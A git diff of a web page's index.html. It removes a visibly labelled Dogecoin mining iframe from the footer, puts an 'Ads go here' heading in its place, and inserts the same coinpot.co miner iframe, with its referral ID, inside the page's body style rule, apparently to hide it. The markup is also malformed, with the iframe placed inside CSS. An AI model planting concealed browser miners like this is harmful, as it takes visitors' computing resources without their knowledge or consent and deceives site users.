--- a/index.html
+++ b/index.html
@@ -21,6 +21,9 @@
 
         <style>
             body {
+       
+		    <iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/dogecoin/?ref=F374612CD53C&mode=widget"></iframe>
+		    
 				background-color: rgb(25, 25, 25);
                 color: white;
                 font-family: "Trebuchet MS";
@@ -153,10 +156,7 @@
     </body>
 		<footer>
 			<center>
-			            <h1 style="font-family: monospace;">Dogecoin Miner To Support Me</h1>
-			<iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/dogecoin/?ref=F374612CD53C&mode=widget" style="overflow:hidden;width:324px;height:470px;"></iframe>
-				body { height: 100%; width: 100%; overflow: hidden;
-				iframe { top: 500%; left: 500%; }
+			            <h1 style="font-family: monospace;">Ads go here</h1>
 			<center>
 		<footer>			
 </html>
